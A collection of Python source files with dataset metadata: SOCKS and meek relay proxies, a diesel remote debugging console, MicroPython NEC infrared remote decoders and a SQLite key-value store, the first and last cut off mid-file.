interval = CLIENT_MAX_POLL_INTERVAL
except Exception as ex:
log.error("[Exception][meek_relay_thread]: %s" % str(ex))
break
self.finish.set()
def write_to_client(self, data):
if self.udpsock:
self.udpsock.sendto(data, self.last_clientaddr)
else:
self.socksconn.sendall(data)
def meek_write_to_client_thread(self):
while not self.finish.is_set():
try:
hasdata = self.l_notifier.wait(timeout=CLIENT_MAX_POLL_INTERVAL)
self.l_notifier.clear()
if not hasdata:
self.timer.count(CLIENT_MAX_POLL_INTERVAL)
if self.timer.timeout():
break
else:
self.timer.reset()
while not self.m2l_queue.empty():
data = self.m2l_queue.get()
if data:
self.write_to_client(data)
except Exception as ex:
log.error("[Exception][meek_write_to_client_thread]: %s" % str(ex))
break
self.finish.set()
def read_from_client(self, timeout):
readable, _, _ = select.select(self.allsocks, [], [], CLIENT_MAX_POLL_INTERVAL)
if not readable:
return None
if self.socksconn in readable:
if self.udpsock:
raise RelaySessionError("unexcepted read-event from tcp socket in UDP session")
data = self.socksconn.recv(MAX_PAYLOAD_LENGTH)
if not data:
raise RelaySessionError("peer closed")
return data
if self.udpsock and self.udpsock in readable:
data, addr = self.udpsock.recvfrom(MAX_PAYLOAD_LENGTH)
if not self.valid_udp_client(addr):
return None
else:
self.last_clientaddr = addr
return data
def meek_read_from_client_thread(self):
while not self.finish.is_set():
try:
data = self.read_from_client(CLIENT_MAX_POLL_INTERVAL)
if not data:
self.timer.count(CLIENT_MAX_POLL_INTERVAL)
if self.timer.timeout():
break
else:
self.timer.reset()
self.l2m_queue.put(data)
self.m_notifier.set()
except Exception as ex:
log.error("[Exception][meek_read_from_client_thread]: %s" % str(ex))
break
self.finish.set()
def proc_tcp_request(self, req):
self.l2m_queue.put(req.pack())
def relay_tcp(self):
read_thread = gevent.spawn(self.meek_read_from_client_thread)
write_thread = gevent.spawn(self.meek_write_to_client_thread)
relay_thread = gevent.spawn(self.meek_relay_thread)
# notify relay to send request
self.m_notifier.set()
[t.join() for t in (read_thread, write_thread, relay_thread)]
log.info("Session %s Ended" % self.sessionid)
def valid_udp_client(self, addr):
if self.client_associate[0] == "0.0.0.0" or \
self.client_associate[0] == "::":
return True
if self.client_associate == addr:
return True
return False
def cmd_udp_associate(self, req):
self.client_associate = (req.dstaddr, req.dstport)
self.last_clientaddr = self.client_associate
for (resp, err) in self.meek_roundtrip([req.pack()]):
if err:
return
if resp:
Reply(resp)
self.udpsock = bind_local_udp(self.socksconn)
if not self.udpsock:
request_fail(self.socksconn, req, GENERAL_SOCKS_SERVER_FAILURE)
return
self.track_sock(self.udpsock)
read_thread = gevent.spawn(self.meek_read_from_client_thread)
write_thread = gevent.spawn(self.meek_write_to_client_thread)
relay_thread = gevent.spawn(self.meek_relay_thread)
request_success(self.socksconn, *sock_addr_info(self.udpsock))
[t.join() for t in (read_thread, write_thread, relay_thread)]
log.info("Session %s Ended" % self.sessionid)
def meek_terminate(self):
headers = {
HEADER_SESSION_ID: self.sessionid,
HEADER_MSGTYPE: MSGTYPE_TERMINATE,
#'Content-Type': "application/octet-stream",
'Content-Length': "0",
'Connection': "Keep-Alive",
'Host': self.relay.hostname,
}
try:
self.httpclient.post("/", data="", headers=headers)
except:
pass
def clean(self):
self.meek_terminate()
for sock in self.allsocks:
sock.close()
#self.httpclient.close()
self.conn_pool.release(self.relay, self.httpclient)
class MeekRelayFactory(RelayFactory):
def __init__(self, relays, ca_certs="", timeout=60):
self.relays = relays
self.timeout = timeout
self.ca_certs = ca_certs
def set_relays(self, relays):
self.relays = relays
def select_relay(self):
self.relays = [r for r in self.relays if r.failure < CLIENT_MAX_FAILURE]
return random.choice(self.relays)
def create_relay_session(self, socksconn, clientaddr):
session = MeekSession(socksconn, self, self.timeout)
log.info("Session %s created for connection from %s" % (session.sessionid, str(clientaddr)))
return session
| {
"repo_name": "kang000feng/firefly-proxy",
"path": "meeksocks/relay.py",
"copies": "6",
"size": "13509",
"license": "bsd-2-clause",
"hash": -6478067166150855000,
"line_mean": 36.1153846154,
"line_max": 100,
"alpha_frac": 0.5368273003,
"autogenerated": false,
"ratio": 4.042190305206463,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.01724853190760661,
"num_lines": 364
} |
# a relay forward local socks to remote socks,
import logging
from gevent import socket
from relay import RelayFactory, RelaySession, RelaySessionError
from utils import pipe_tcp, bind_local_udp, request_fail, send_request, \
sock_addr_info, read_reply, request_success, pipe_udp, read_init_request, \
read_init_reply, read_request
from msg import GENERAL_SOCKS_SERVER_FAILURE, UDP_ASSOCIATE, SUCCEEDED, \
CONNECT, BIND
log = logging.getLogger(__name__)
class SocksForwardSession(RelaySession):
def __init__(self, socksconn, remoteconn):
super(SocksForwardSession, self).__init__(socksconn)
self.remoteconn = remoteconn
self.track_sock(self.remoteconn)
self.remotetimeout = self.remoteconn.gettimeout()
self.client_associate = None
self.last_clientaddr = None
self.client2local_udpsock = None
self.local2remote_udpsock = None
def proc_tcp_request(self, req):
self.remoteconn.sendall(req.pack())
def relay_tcp(self):
pipe_tcp(self.socksconn, self.remoteconn, self.timeout, self.remotetimeout)
def proc_udp_request(self, req):
self.client_associate = (req.dstaddr, req.dstport)
self.last_clientaddr = self.client_associate
self.client2local_udpsock = bind_local_udp(self.socksconn)
self.local2remote_udpsock = bind_local_udp(self.remoteconn)
if not self.client2local_udpsock or not self.local2remote_udpsock:
request_fail(self.socksconn, req, GENERAL_SOCKS_SERVER_FAILURE)
return False
self.track_sock(self.client2local_udpsock)
self.track_sock(self.local2remote_udpsock)
send_request(self.remoteconn, UDP_ASSOCIATE, *sock_addr_info(self.local2remote_udpsock))
reply = read_reply(self.remoteconn)
if reply.rep != SUCCEEDED:
return False
self.remote_associate = (reply.bndaddr, reply.bndport)
request_success(self.socksconn, *sock_addr_info(self.client2local_udpsock))
return True
def relay_udp(self):
def addrchecker():
def _(ip, port):
if self.client_associate[0] == "0.0.0.0" or \
self.client_associate[0] == "::":
return True
if self.client_associate == (ip, port):
return True
return False
return _
def c2r():
def _(data, addr):
self.last_clientaddr = addr
return data, self.remote_associate
return _
def r2c():
def _(data, addr):
return data, self.last_clientaddr
return _
pipe_udp([self.socksconn, self.remoteconn],
self.client2local_udpsock, self.local2remote_udpsock,
self.timeout, self.remotetimeout,
addrchecker(), c2r(), r2c())
def cmd_udp_associate(self, req):
if self.proc_udp_request(req):
self.relay_udp()
def process(self):
try:
initreq = read_init_request(self.socksconn)
self.remoteconn.sendall(initreq.pack())
initreply = read_init_reply(self.remoteconn)
self.socksconn.sendall(initreply.pack())
req = read_request(self.socksconn)
{
CONNECT: self.cmd_connect,
BIND: self.cmd_bind,
UDP_ASSOCIATE : self.cmd_udp_associate
}[req.cmd](req)
self.clean()
except Exception, e:
log.error("[Exception][SocksForwardSession]: %s" % str(e))
self.clean()
class SocksForwardFactory(RelayFactory):
""" forward to another socks.
"""
def __init__(self, remoteip, remoteport, timeout=30):
self.remoteip = remoteip
self.remoteport = remoteport
self.timeout = timeout
def create_relay_session(self, socksconn, clientaddr):
try:
log.info("New socks connection from %s" % str(clientaddr))
remoteconn = socket.create_connection((self.remoteip, self.remoteport), self.timeout)
remoteconn.settimeout(self.timeout)
return SocksForwardSession(socksconn, remoteconn)
except socket.timeout, e: # @UndefinedVariable
log.error("[Exception][create_relay_session]: %s" % str(e))
raise RelaySessionError("Remote Timeout.")
| {
"repo_name": "yinghuocho/firefly-proxy",
"path": "DEPRECATED_PYTHON_SRC/gsocks/socks_relay.py",
"copies": "6",
"size": "4538",
"license": "bsd-2-clause",
"hash": 1914957146691816200,
"line_mean": 36.5123966942,
"line_max": 97,
"alpha_frac": 0.5973997356,
"autogenerated": false,
"ratio": 3.8786324786324786,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.02422345770098657,
"num_lines": 121
} |
# a relay with policy based forwarding.
import logging
import re
from gevent import socket
from relay import SocksSession, RelayFactory, RelaySession
from socks_relay import SocksForwardSession
import msg
import utils
log = logging.getLogger(__name__)
class ForwardDestination(object):
def __init__(self, scheme, data):
self.scheme = scheme
self.data = data
def __repr__(self):
return "<%s:%r>" % (self.scheme, self.data)
class ForwardMatcher(object):
def find(self, host, port, proto="tcp"):
# return a list of ForwardScheme objects
return None
class RESocksMatcher(ForwardMatcher):
def __init__(self, rules):
self.rules = rules
def find(self, host, port, proto="tcp"):
for (pattern, dst) in self.rules.iteritems():
(h, p, pr) = pattern
if re.match(pr, proto) and re.match(h, host.rstrip(".")) \
and re.match(p, str(port)):
log.info("forward rule %s found for %s:%d:%s" % (dst, host, port, proto))
return dst
return None
class SmartRelayError(Exception): pass
class SmartRelaySession(RelaySession):
def __init__(self, socksconn, timeout, matcher):
super(SmartRelaySession, self).__init__(socksconn)
self.forwarders = {}
self.matcher = matcher
self.handler = None
self.register_forwarder("socks5", "tcp", self.forward_socks5_tcp)
self.register_forwarder("socks5", "udp", self.forward_socks5_udp)
def register_forwarder(self, scheme, proto, forwarder):
self.forwarders["_".join([scheme, proto])] = forwarder
def find_forwarder(self, scheme, proto):
return self.forwarders.get("_".join([scheme, proto]), None)
def forward_socks5_handshake(self, socksconn):
initreq = msg.InitRequest()
socksconn.sendall(initreq.pack())
initreply = utils.read_init_reply(socksconn)
if initreply.method != msg.NO_AUTHENTICATION_REQUIRED:
return False
return True
def forward_socks5_tcp(self, url, req):
remoteconn = socket.create_connection((url.hostname, url.port), self.timeout)
remoteconn.settimeout(self.timeout)
handler = SocksForwardSession(self.socksconn, remoteconn)
self.handler = handler
# handshake, send request, then start to pipe
if self.forward_socks5_handshake(handler.remoteconn):
handler.proc_tcp_request(req)
handler.relay_tcp()
return True
def forward_socks5_udp(self, url, localhandler, firstdata, firstaddr):
remoteconn = socket.create_connection((url.hostname, url.port), self.timeout)
remoteconn.settimeout(self.timeout)
handler = SocksForwardSession(self.socksconn, remoteconn)
# copy already-exist states from local handler
handler.client_associate = localhandler.client_associate
handler.last_clientaddr = localhandler.last_clientaddr
handler.client2local_udpsock = localhandler.client2local_udpsock
handler.track_sock(handler.client2local_udpsock)
self.handler = handler
# handshake, then request-reply, then send first packet, finally start to pipe
if self.forward_socks5_handshake(handler.remoteconn):
handler.local2remote_udpsock = utils.bind_local_udp(handler.remoteconn)
handler.track_sock(handler.local2remote_udpsock)
utils.send_request(handler.remoteconn, msg.UDP_ASSOCIATE, *utils.sock_addr_info(handler.local2remote_udpsock))
reply = utils.read_reply(handler.remoteconn)
if reply.rep != msg.SUCCEEDED:
return False
handler.remote_associate = (reply.bndaddr, reply.bndport)
handler.last_clientaddr = firstaddr
handler.local2remote_udpsock.sendto(firstdata, handler.remote_associate)
handler.relay_udp()
return True
def forward_tcp(self, dst, req):
forwarder = self.find_forwarder(dst.scheme, "tcp")
if forwarder:
forwarder(dst.data, req)
else:
raise SmartRelayError("forward scheme %s not supported" % dst.scheme)
def forward_udp(self, dst, localhandler, firstdata, firstaddr):
forwarder = self.find_forwarder(dst.scheme, "udp")
if forwarder:
forwarder(dst.data, localhandler, firstdata, firstaddr)
else:
raise SmartRelayError("forward scheme %s not supported" % dst.scheme)
def cmd_connect(self, req):
dst = self.matcher.find(req.dstaddr, req.dstport, proto="tcp")
if not dst:
# no forward schemes found, go as local socks proxy
handler = SocksSession(self.socksconn)
self.handler = handler
handler.proc_tcp_request(req)
handler.relay_tcp()
else:
self.forward_tcp(dst, req)
def cmd_udp_associate(self, req):
handler = SocksSession(self.socksconn)
self.handler = handler
if handler.proc_udp_request(req):
# a UDP session is determined by first UDP packet
firstdata, firstaddr = handler.wait_for_first_udp()
scheme = self.matcher.find(firstaddr[0], firstaddr[1], proto="udp")
if not scheme:
# no forward schemes found, go as local socks proxy
handler.relay_udp(firstdata, firstaddr)
else:
self.forward_udp(scheme, handler, firstdata, firstaddr)
def clean(self):
super(SmartRelaySession, self).clean()
if self.handler:
self.handler.clean()
class SmartRelayFactory(RelayFactory):
def __init__(self, matcher, timeout=30):
self.matcher = matcher
self.timeout = timeout
def set_matcher(self, matcher):
self.matcher = matcher
def create_relay_session(self, socksconn, clientaddr):
return SmartRelaySession(socksconn, self.timeout, self.matcher)
| {
"repo_name": "yinghuocho/gsocks",
"path": "smart_relay.py",
"copies": "6",
"size": "6193",
"license": "bsd-2-clause",
"hash": -8492511650629450000,
"line_mean": 38.7051282051,
"line_max": 122,
"alpha_frac": 0.621669627,
"autogenerated": false,
"ratio": 4.0371577574967406,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.019266500557910852,
"num_lines": 156
} |
"""A remote console into running diesel applications.
With the functions and classes in this module you can open remote Python
console sessions into your diesel applications. Technically, they aren't
remote because it is hardcoded to run over localhost. But they are remote
from a process point of view.
An application that wishes to provide a remote console only needs to import
and call the `install_console_signal_handler` function. That sets a handler
for the SIGTRAP signal that attempts to make a connection to a certain port
on localhost.
Running there should be this module's `main` function. It sends the SIGTRAP
to a specified PID and then waits for a connection.
This inversion of the typical client/server roles is to allow for easily
getting a console into one of many processes running on a host without having
to configure a persistent remote console port or service for each one.
The code also handles redirecting stdout for the console so that the results of
`print` statements and the like are sent to the connected console and not the
local stdout of the process. All other output to stdout will be directed to the
process's normal stdout.
"""
import code
import optparse
import os
import readline # for history feature side-effect
import signal
import struct
import sys
from cStringIO import StringIO
import diesel
from diesel.util import debugtools
port = 4299
def install_console_signal_handler():
"""Call this function to provide a remote console in your app."""
def connect_to_user_console(sig, frame):
diesel.fork_from_thread(application_console_endpoint)
signal.signal(signal.SIGTRAP, connect_to_user_console)
class LocalConsole(code.InteractiveConsole):
"""A modified Python interpreter UI that talks to a remote console."""
def runsource(self, source, filename=None):
self.current_source = source.encode('utf-8')
return code.InteractiveConsole.runsource(self, source, filename)
def runcode(self, ignored_codeobj):
if self.current_source:
sz = len(self.current_source)
header = struct.pack('>Q', sz)
diesel.send("%s%s" % (header, self.current_source))
self.current_source = None
header = diesel.receive(8)
(sz,) = struct.unpack('>Q', header)
if sz:
data = diesel.receive(sz)
print data.rstrip()
def console_for(pid):
"""Sends a SIGTRAP to the pid and returns a console UI handler.
The return value is meant to be passed to a diesel.Service.
"""
os.kill(pid, signal.SIGTRAP)
banner = "Remote console PID=%d" % pid
def interactive(addr):
remote_console = LocalConsole()
remote_console.interact(banner)
diesel.quickstop()
return interactive
class RemoteConsoleService(diesel.Client):
"""Runs the backend console."""
def __init__(self, *args, **kw):
self.interpreter = BackendInterpreter({
'diesel':diesel,
'debugtools':debugtools,
})
super(RemoteConsoleService, self).__init__(*args, **kw)
@diesel.call
def handle_command(self):
header = diesel.receive(8)
(sz,) = struct.unpack('>Q', header)
data = diesel.receive(sz)
stdout_patch = StdoutDispatcher()
with stdout_patch:
self.interpreter.runsource(data)
output = stdout_patch.contents
outsz = len(output)
outheader = struct.pack('>Q', outsz)
diesel.send("%s%s" % (outheader, output))
class BackendInterpreter(code.InteractiveInterpreter):
def write(self, data):
sys.stdout.write(data)
def application_console_endpoint():
"""Connects to the console UI and runs until disconnected."""
diesel.sleep(1)
try:
session = RemoteConsoleService('localhost', port)
except diesel.ClientConnectionError:
diesel.log.error('Failed to connect to local console')
else:
diesel.log.warning('Connected to local console')
with session:
while True:
try:
session.handle_command()
except diesel.ClientConnectionClosed:
diesel.log.warning('Disconnected from local console')
break
class StdoutDispatcher(object):
"""Dispatches calls to stdout to fake or real file-like objects.
The creator of an instance will receive the fake file-like object and
all others will receive the original stdout instance.
"""
def __init__(self):
self.owning_loop = diesel.core.current_loop.id
self._orig_stdout = sys.stdout
self._fake_stdout = StringIO()
def __getattr__(self, name):
if diesel.core.current_loop.id == self.owning_loop:
return getattr(self._fake_stdout, name)
else:
return getattr(self._orig_stdout, name)
def __enter__(self):
sys.stdout = self
return self
def __exit__(self, *args):
sys.stdout = self._orig_stdout
@property
def contents(self):
return self._fake_stdout.getvalue()
def main():
parser = optparse.OptionParser("Usage: %prog PID")
parser.add_option(
'-p', '--port', default=port, type="int",
help="The port to listen on for console connections",
)
options, args = parser.parse_args()
if not args:
parser.print_usage()
raise SystemExit(1)
if args[0] == 'dummy':
print "PID", os.getpid()
def wait_for_signal():
log = diesel.log.name('dummy')
log.min_level = diesel.loglevels.INFO
install_console_signal_handler()
while True:
log.info("sleeping")
diesel.sleep(5)
diesel.quickstart(wait_for_signal)
else:
pid = int(args[0])
svc = diesel.Service(console_for(pid), options.port)
diesel.quickstart(svc)
if __name__ == '__main__':
main()
| {
"repo_name": "dieseldev/diesel",
"path": "diesel/console.py",
"copies": "1",
"size": "5987",
"license": "bsd-3-clause",
"hash": -6159540925617853000,
"line_mean": 32.0773480663,
"line_max": 79,
"alpha_frac": 0.65040922,
"autogenerated": false,
"ratio": 4.10068493150685,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0024440740921618837,
"num_lines": 181
} |
# Author: Peter Hinch
# Copyright Peter Hinch 2017 Released under the MIT license
from sys import platform
import uasyncio as asyncio
from asyn import Event
from micropython import const
from array import array
from utime import ticks_us, ticks_diff
if platform == 'pyboard':
from pyb import Pin, ExtInt
else:
from machine import Pin
ESP32 = platform == 'esp32' or platform == 'esp32_LoBo'
# Save RAM
# from micropython import alloc_emergency_exception_buf
# alloc_emergency_exception_buf(100)
# Result codes (accessible to application)
# Repeat button code
REPEAT = -1
# Error codes
BADSTART = -2
BADBLOCK = -3
BADREP = -4
OVERRUN = -5
BADDATA = -6
BADADDR = -7
_EDGECOUNT = const(68) # No. of edges in data block
# On 1st edge start a block timer. When it times out decode the data. Time must
# exceed the worst case block transmission time, but (with asyncio latency) be
# less than the interval between a block start and a repeat code start (108ms)
# Value of 73 allows for up to 35ms latency.
class NEC_IR():
def __init__(self, pin, callback, extended, *args): # Optional args for callback
self._ev_start = Event()
self._callback = callback
self._extended = extended
self._addr = 0
self.block_time = 80 if extended else 73 # Allow for some tx tolerance (?)
self._args = args
self._times = array('i', (0 for _ in range(_EDGECOUNT + 1))) # +1 for overrun
if platform == 'pyboard':
ExtInt(pin, ExtInt.IRQ_RISING_FALLING, Pin.PULL_NONE, self._cb_pin)
else: # PR5962 ESP8266 hard IRQ's not supported
pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
#elif ESP32:
#pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
#else:
#pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING), hard = True)
self._edge = 0
self._ev_start.clear()
loop = asyncio.get_event_loop()
loop.create_task(self._run())
async def _run(self):
loop = asyncio.get_event_loop()
while True:
await self._ev_start # Wait until data collection has started
# Compensate for asyncio latency
latency = ticks_diff(loop.time(), self._ev_start.value())
await asyncio.sleep_ms(self.block_time - latency) # Data block should have ended
self._decode() # decode, clear event, prepare for new rx, call cb
# Pin interrupt. Save time of each edge for later decode.
def _cb_pin(self, line):
t = ticks_us()
# On overrun ignore pulses until software timer times out
if self._edge <= _EDGECOUNT: # Allow 1 extra pulse to record overrun
if not self._ev_start.is_set(): # First edge received
loop = asyncio.get_event_loop()
self._ev_start.set(loop.time()) # asyncio latency compensation
self._times[self._edge] = t
self._edge += 1
def _decode(self):
overrun = self._edge > _EDGECOUNT
val = OVERRUN if overrun else BADSTART
if not overrun:
width = ticks_diff(self._times[1], self._times[0])
if width > 4000: # 9ms leading mark for all valid data
width = ticks_diff(self._times[2], self._times[1])
if width > 3000: # 4.5ms space for normal data
if self._edge < _EDGECOUNT:
# Haven't received the correct number of edges
val = BADBLOCK
else:
# Time spaces only (marks are always 562.5µs)
# Space is 1.6875ms (1) or 562.5µs (0)
# Skip last bit which is always 1
val = 0
for edge in range(3, _EDGECOUNT - 2, 2):
val >>= 1
if ticks_diff(self._times[edge + 1], self._times[edge]) > 1120:
val |= 0x80000000
elif width > 1700: # 2.5ms space for a repeat code. Should have exactly 4 edges.
val = REPEAT if self._edge == 4 else BADREP
addr = 0
if val >= 0: # validate. Byte layout of val ~cmd cmd ~addr addr
addr = val & 0xff
cmd = (val >> 16) & 0xff
if addr == ((val >> 8) ^ 0xff) & 0xff: # 8 bit address OK
val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
self._addr = addr
else:
addr |= val & 0xff00 # pass assumed 16 bit address to callback
if self._extended:
val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
self._addr = addr
else:
val = BADADDR
if val == REPEAT:
addr = self._addr # Last valid addresss
self._edge = 0 # Set up for new data burst and run user callback
self._ev_start.clear()
self._callback(val, addr, *self._args)
| {
"repo_name": "peterhinch/micropython-async",
"path": "v2/nec_ir/aremote.py",
"copies": "1",
"size": "5208",
"license": "mit",
"hash": -5470052853985313000,
"line_mean": 40.9838709677,
"line_max": 103,
"alpha_frac": 0.5681905494,
"autogenerated": false,
"ratio": 3.7399425287356323,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9795877199024383,
"avg_score": 0.002451175822249855,
"num_lines": 124
} |
# Author: Peter Hinch
# Copyright Peter Hinch 2017 Released under the MIT license
from sys import platform
import uasyncio as asyncio
from primitives.message import Message
from micropython import const
from array import array
from utime import ticks_ms, ticks_us, ticks_diff
if platform == 'pyboard':
from pyb import Pin, ExtInt
else:
from machine import Pin
ESP32 = platform == 'esp32' or platform == 'esp32_LoBo'
# Save RAM
# from micropython import alloc_emergency_exception_buf
# alloc_emergency_exception_buf(100)
# Result codes (accessible to application)
# Repeat button code
REPEAT = -1
# Error codes
BADSTART = -2
BADBLOCK = -3
BADREP = -4
OVERRUN = -5
BADDATA = -6
BADADDR = -7
_EDGECOUNT = const(68) # No. of edges in data block
# On 1st edge start a block timer. When it times out decode the data. Time must
# exceed the worst case block transmission time, but (with asyncio latency) be
# less than the interval between a block start and a repeat code start (108ms)
# Value of 73 allows for up to 35ms latency.
class NEC_IR():
def __init__(self, pin, callback, extended, *args): # Optional args for callback
self._ev_start = Message()
self._callback = callback
self._extended = extended
self._addr = 0
self.block_time = 80 if extended else 73 # Allow for some tx tolerance (?)
self._args = args
self._times = array('i', (0 for _ in range(_EDGECOUNT + 1))) # +1 for overrun
if platform == 'pyboard':
ExtInt(pin, ExtInt.IRQ_RISING_FALLING, Pin.PULL_NONE, self._cb_pin)
else: # PR5962 ESP8266 hard IRQ's not supported
pin.irq(handler = self._cb_pin, trigger = (Pin.IRQ_FALLING | Pin.IRQ_RISING))
self._edge = 0
self._ev_start.clear()
asyncio.create_task(self._run())
async def _run(self):
while True:
await self._ev_start # Wait until data collection has started
# Compensate for asyncio latency
latency = ticks_diff(ticks_ms(), self._ev_start.value())
await asyncio.sleep_ms(self.block_time - latency) # Data block should have ended
self._decode() # decode, clear event, prepare for new rx, call cb
# Pin interrupt. Save time of each edge for later decode.
def _cb_pin(self, line):
t = ticks_us()
# On overrun ignore pulses until software timer times out
if self._edge <= _EDGECOUNT: # Allow 1 extra pulse to record overrun
if not self._ev_start.is_set(): # First edge received
self._ev_start.set(ticks_ms()) # asyncio latency compensation
self._times[self._edge] = t
self._edge += 1
def _decode(self):
overrun = self._edge > _EDGECOUNT
val = OVERRUN if overrun else BADSTART
if not overrun:
width = ticks_diff(self._times[1], self._times[0])
if width > 4000: # 9ms leading mark for all valid data
width = ticks_diff(self._times[2], self._times[1])
if width > 3000: # 4.5ms space for normal data
if self._edge < _EDGECOUNT:
# Haven't received the correct number of edges
val = BADBLOCK
else:
# Time spaces only (marks are always 562.5µs)
# Space is 1.6875ms (1) or 562.5µs (0)
# Skip last bit which is always 1
val = 0
for edge in range(3, _EDGECOUNT - 2, 2):
val >>= 1
if ticks_diff(self._times[edge + 1], self._times[edge]) > 1120:
val |= 0x80000000
elif width > 1700: # 2.5ms space for a repeat code. Should have exactly 4 edges.
val = REPEAT if self._edge == 4 else BADREP
addr = 0
if val >= 0: # validate. Byte layout of val ~cmd cmd ~addr addr
addr = val & 0xff
cmd = (val >> 16) & 0xff
if addr == ((val >> 8) ^ 0xff) & 0xff: # 8 bit address OK
val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
self._addr = addr
else:
addr |= val & 0xff00 # pass assumed 16 bit address to callback
if self._extended:
val = cmd if cmd == (val >> 24) ^ 0xff else BADDATA
self._addr = addr
else:
val = BADADDR
if val == REPEAT:
addr = self._addr # Last valid addresss
self._edge = 0 # Set up for new data burst and run user callback
self._ev_start.clear()
self._callback(val, addr, *self._args)
| {
"repo_name": "peterhinch/micropython-async",
"path": "v3/as_drivers/nec_ir/aremote.py",
"copies": "1",
"size": "4878",
"license": "mit",
"hash": -1874614908168559400,
"line_mean": 40.6752136752,
"line_max": 96,
"alpha_frac": 0.5711648893,
"autogenerated": false,
"ratio": 3.8004676539360873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4871632543236087,
"avg_score": null,
"num_lines": null
} |
# Arena Game Mode
from __init__ import gameMode as mode
from random import uniform, choice
from copy import deepcopy as new
HS_RARITY_RANK = {0:'Free',1:'Common',2:'Rare',3:'Epic',4:'Legendary'}
HS_UPGRADE_CHANCE = 0.2
name = 'Arena'
key = 'arena'
description = "Emulate the standard Hearthstone arena and practice drafting by creating a mock deck."
class gameMode(mode):
def getCardsForRarity(self,rarity):
coll = self.collection
icards = lambda d: coll.iterCardsForRarity(HS_RARITY_RANK[d])
# Get all cards.
cards = [card for card in icards(rarity) if
self.isApplicableCard(card)]
# Couple basic and common cards.
if rarity == 1:
cards += [card for card in icards(0) if
self.isApplicableCard(card)]
# Go through and only return cards that are class types.
return cards
def isApplicableCard(self,card):
return (not card.getHero() or card.getHero() == self.hero.getHero())
def getSet(self,currRarity=1):
# See what tier of rarity.
random = uniform(0,1)
while random <= HS_UPGRADE_CHANCE and currRarity < len(HS_RARITY_RANK) - 1:
# Upgrade to the next tier!
currRarity += 1
random = uniform(0,1)
# Assign set of 3 cards of this rarity.
cards = self.getCardsForRarity(currRarity)
set = []
for x in xrange(3):
card = choice(cards)
while card in set:
card = choice(cards)
set.append(new(card))
return tuple(set)
def getDraft(self,numCards):
''' Make a draft of numCards sets of three cards. '''
sets = []
for set in xrange(numCards):
if set in [0,9,19,29]:
sets.append(self.getSet(2))
else: sets.append(self.getSet())
return sets
| {
"repo_name": "AlexSafatli/HearthstoneDrafter",
"path": "modes/arena.py",
"copies": "1",
"size": "2090",
"license": "mit",
"hash": -5005491515839342000,
"line_mean": 30.1940298507,
"line_max": 105,
"alpha_frac": 0.5358851675,
"autogenerated": false,
"ratio": 3.779385171790235,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4815270339290235,
"avg_score": null,
"num_lines": null
} |
"""A replacement for the PYPI shove module, which unfortunately seems not to be thread safe.
Licensed under the 3-clause BSD License:
Copyright (c) 2011, Neeraj Kumar (neerajkumar.org)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the author nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL NEERAJ KUMAR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
class SQLiteStore(object):
"""Sqlite-backing for Shove"""
def __init__(self, uri):
"""Creates a sqlite store"""
import sqlite3
self.uri = uri
self.c = sqlite3.connect(uri).cursor()
self.c.execute('create table if not exists store ("key" varchar(1024) not null, value blob not null, primary key ("key"))')
def execute(self, q, arg=None, **kw):
"""Executes a query and returns a list, retrying on error upto retries times.
Finally raises an operational error if not successful"""
import sqlite3
for i in range(kw.get('retries', 10)):
try:
if arg:
ret = list(self.c.execute(q, arg))
else:
ret = list(self.c.execute(q))
return ret
except sqlite3.OperationalError: pass
raise sqlite3.OperationalError('Could not execute query %s' % (q,))
def selectone(self, q, *args, **kw):
"""Executes a query and returns the first element of the first row"""
ret = self.execute(q, *args, **kw)
return ret[0][0]
def commit(self, retries=10):
"""Commits, with given number of retries"""
import sqlite3
for i in range(retries):
try:
self.c.connection.commit()
except sqlite3.OperationalError: pass
def __len__(self):
ret = self.selectone('select count(*) from store')
return ret
def __getitem__(self, k):
import cPickle as pickle
try:
ret = str(self.selectone('select value from store where key=? limit 1', (k,)))
#print 'got ret %s for k %s' % (len(ret), k)
return pickle.loads(ret)
except IndexError: raise KeyError('%s not found in sqlite' % (k,))
def __setitem__(self, k, v):
import cPickle as pickle
import sqlite3
v = sqlite3.Binary(pickle.dumps(v, protocol=1))
self.execute('insert or replace into store (key, value) values (?, ?)', (k, v))
self.commit()
def __delitem__(self, k):
try:
ret = self.selectone('select key from store where key=?', (k,))
